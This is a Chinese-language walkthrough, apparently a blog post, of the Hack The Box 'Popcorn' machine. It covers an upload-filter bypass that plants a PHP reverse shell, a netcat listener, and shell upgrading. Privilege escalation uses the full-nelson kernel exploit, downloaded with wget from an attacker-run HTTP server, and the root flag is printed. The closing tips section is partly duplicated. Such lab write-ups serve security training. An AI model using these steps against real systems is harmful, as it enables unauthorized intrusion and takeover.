Popcorn-10.10.10.6
DateTime:2019/09/16
信息收集
nmap 扫描到开放端口80、22
web服务器:apache
操作系统: Ubuntu
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qChlPd0g-1571991451206)(_v_images/20190916210414863_22328.png)]](https://i-blog.csdnimg.cn/blog_migrate/135fa1d12b8f7dd0788c75f1bd8ec007.png)
访问 10.10.10.6:80,
扫描网站目录,使用Dirbuster
选择 go faster,
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HpBSexAx-1571991451207)(_v_images/20190918093833418_28576.png)]](https://i-blog.csdnimg.cn/blog_migrate/052496c80ffdbb9f6f3409c54e3dc28b.png)
选择字典 /usr/share/wordlist/dirbuster/directory-list-…
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AsaeoXcH-1571991451207)(_v_images/20190918093635053_27410.png)]](https://i-blog.csdnimg.cn/blog_migrate/2ffd4ce5bffe592edd3d1f448cfe751c.png)
扫描后发现很多目录,挨着测试,发现/test.php和/torrent,其中/torrent可以上传文件
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HSk3krGe-1571991451207)(_v_images/20190918094954956_21506.png)]](https://i-blog.csdnimg.cn/blog_migrate/0dde4cd7fa51ee5a79bdea88b684efb3.png)
开始渗透
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6edy6u95-1571991451207)(_v_images/20190918095247934_24937.png)]](https://i-blog.csdnimg.cn/blog_migrate/88f4e063e08926d0b6cbe0ed766eb220.png)
在上传了一个torrent文件后,会要求你上传一个screenshot,在此处我们可以上传一个php的反弹shell
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lSXjMXjC-1571991451207)(_v_images/20190917093957509_32483.png)]](https://i-blog.csdnimg.cn/blog_migrate/a54785d965839b72483d7d840a1ccf5d.png)
由于文件格式限制,在上传时进行抓包,修改文件Content-Type为image/php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LRMBcImJ-1571991451208)(_v_images/20190917093920006_2170.png)]](https://i-blog.csdnimg.cn/blog_migrate/7c11143c8c7ae09b4743c3443b6bab31.png)
成功绕过
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XncP5hF4-1571991451208)(_v_images/20190917094152882_17776.png)]](https://i-blog.csdnimg.cn/blog_migrate/0f8c9a192e023ec5f7c95a3044695019.png)
在本机上开启监听
nc -lvp 443
端口和shell里面设定的一致,其中shell里面还要设置本机虚拟ip
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-261gbJRs-1571991451208)(_v_images/20190917094241905_11935.png)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vVskFvv0-1571991451208)(_v_images/20190918100514951_6020.png)]](https://i-blog.csdnimg.cn/blog_migrate/574ed2b35e9c5a90f3a3a8a8025f1260.png)
再次访问shell所在之处的screenshot,触发反弹shell
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dn4fGHjz-1571991451208)(_v_images/20190917094528141_19967.png)]](https://i-blog.csdnimg.cn/blog_migrate/fbf8b8b79b8950a54c7575183490da4c.png)
本机响应后,成功进入主机
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DEOeaUX4-1571991451208)(_v_images/20190917094546419_27330.png)]](https://i-blog.csdnimg.cn/blog_migrate/ea2c3cbd190be3d3cc943cfa824edc03.png)
whoami #查看当前用户权限
lsb_release -a #查看主机信息
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bKfi5AWH-1571991451209)(_v_images/20190917094847525_16579.png)]](https://i-blog.csdnimg.cn/blog_migrate/f9be2b3b04e13bec244d3a8f96bc4580.png)
uname -a #Linux查看版本当前操作系统内核信息
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lCHKp9Cc-1571991451209)(_v_images/20190917094926196_8982.png)]](https://i-blog.csdnimg.cn/blog_migrate/f57ae03f515d2a0513234a9d171057f6.png)
searchsploit ubuntu 9.10 #查找利用脚本,在此处可用14339.sh
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hRyQWBot-1571991451209)(_v_images/20190917095401747_28313.png)]](https://i-blog.csdnimg.cn/blog_migrate/887d9aec16f1b21d8176d1206e3272f0.png)
get user flag
** 在 /home/georges 里面找到user.txt,get第一个flag **
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XrkXJ4Hm-1571991451209)(_v_images/20190917163632729_16414.png)]](https://i-blog.csdnimg.cn/blog_migrate/0dbe2ba75b12b1e9160c843dd7653e76.png)
要找到root.txt 就需要提权,若直接下载使用14339.sh脚本则会报一些奇怪的错误,
需要将14339.sh 里面的代码复制到新建的sh中,命名为1.sh
在目标主机里,很多键和命令都不好使用
用盖总给的命令,使目标主机有交互式shell
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ ctrl + z
$ stty raw -echo && fg
$ export TERM=screen
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9uDNOLWV-1571991451209)(_v_images/20190917172827488_11169.png)]](https://i-blog.csdnimg.cn/blog_migrate/ea2b598efe1d24c5eb9cc6c2e4b9d13b.png)
提权之前能比较容易的找到/tmp目录有执行的权限
所以
bash /tmp/1.sh
按理说 在此处我已经get root了,脚本没错脚本里的密码也多次确认,可就是get不到root整了一天多,脑袋疼。。。。
那就假装已经 get root了吧
补充:解决脚本不能成功执行的问题 在复制脚本里的代码时,记得在代码加几个回车再加几个空格~师父解决的_
get root!!
在师父的帮助下,换了一种思路。get root
我们开始用的提权脚本可能有点点未知的问题~~
换一个,使用 linux-exploit-suggester.sh提权建议脚本~
https://github.com/mzet-/linux-exploit-suggester/tree/95a05ccfc2aca6803021610aa06eab41a489f07d
download .zip
使用相同的方法把 该zip 传到目标机器上,在目标机器上运行linux-exploit-suggester.sh
该脚本给出了一大串提权建议
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jHye1shg-1571991451210)(_v_images/20190923103450655_19039.png)]](https://i-blog.csdnimg.cn/blog_migrate/0d000306f00b77654398ef3021900a9c.png)
刚开始使用了dirtycow ,莫名的错误~
改用第一个 full-nelson
进入到利用脚本目录下搭建一个小型服务器~~和上面相同的方法,在目标主机上用 wget 获得该利用脚本
gcc 文件名.c -o 你需要执行文件名称
gcc 15704.c -o tst
./tst
执行成功,get root
root.flag
f122331023a9393319a0370129fd9b14
补充
想把本机文件传到目标主机上时,可使用python本机搭建成一个小型服务器,目标主机访问本机相应路径来获得文件
命令1
本机
python -m SimpleHTTPServer 8888
目标主机
wget ip:8888 /文件
命令2(更简短)
本机
python3 -m http.server 8888
目标主机
wget ip:8888/文件
ver 8888
目标主机
wget ip:8888 /文件
命令2(更简短)
本机
python3 -m http.server 8888
目标主机
wget ip:8888/文件
464
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
